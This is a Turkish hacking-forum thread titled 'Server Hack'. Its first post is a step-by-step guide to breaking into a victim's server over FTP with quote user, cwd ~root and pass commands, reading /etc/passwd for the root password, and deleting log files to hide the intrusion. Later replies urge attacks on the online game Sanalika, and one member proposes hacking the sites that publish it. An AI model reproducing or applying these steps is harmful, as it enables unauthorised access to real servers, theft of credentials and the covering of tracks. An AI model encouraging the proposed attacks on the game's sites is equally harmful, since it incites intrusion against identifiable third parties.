Server Hack..// Te@M_LiDeR

Te@M_LiDeR

Katılımcı Üye
6 Haz 2009
496
0
RiZe
Internete baglandıktan sonra hemen dos komut istemine'e cıkın...
Kurban yerine hackliyceginiz server'ı yazın adamın serverını filan bulmak icin internic.com a gidin search yapın sayfanın en altında
yazar..

ftp kurban.com
server username sorcak entera basıp gecin
server password sorcak entera basıp bunuda gecin
ve sunu yazın
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp

Sonra mutlaka log file ını silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptıysanız ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim root password en
yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..

Not: Bu yontem yeni serverlarda calısmıyor. Universitelerde filan calısıyor..

#.FirLaMa.#

Katılımcı Üye
29 Ağu 2009
363
0
İstanbul
admınlık

hocam ben admınlık aldım para verdim o kadar parayı alana kadar canım cıcım admınlık yazıldıktan sonra küfür ediyorlar yetki kullanma ozgurlugumu kısıtladılar + banladılar frag kasılcak bir server değil bende ceza vermek istiyorum arkadaşlar bu arada "SANALIKA" adlı müslüman ve türk gençlerin beynini yıkayan bu oyuna karşı savaş açtım lütfen mesajlarınızı ve katılımlarınızı bekliyorum

craver_hakan

Uzman üye
3 Eyl 2008
1,035
4
Never mind
hocam ben admınlık aldım para verdim o kadar parayı alana kadar canım cıcım admınlık yazıldıktan sonra küfür ediyorlar yetki kullanma ozgurlugumu kısıtladılar + banladılar frag kasılcak bir server değil bende ceza vermek istiyorum arkadaşlar bu arada "SANALIKA" adlı müslüman ve türk gençlerin beynini yıkayan bu oyuna karşı savaş açtım lütfen mesajlarınızı ve katılımlarınızı bekliyorum

Fırlama arkadaşımıza katılıyorum çünkü sanalika denilen oyun bağımlı yapıyor küçük yaştaki çocuklara bunu önlemeliyiz...

:inv:inv:inv:inv:inv

Te@M_LiDeR

Katılımcı Üye
6 Haz 2009
496
0
RiZe
oyuna ne tür bi saldırı yapılır anlamadm :D..elimizden gelen tek bişe var o oyunun yayımladıkları siteleri hacklemek

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.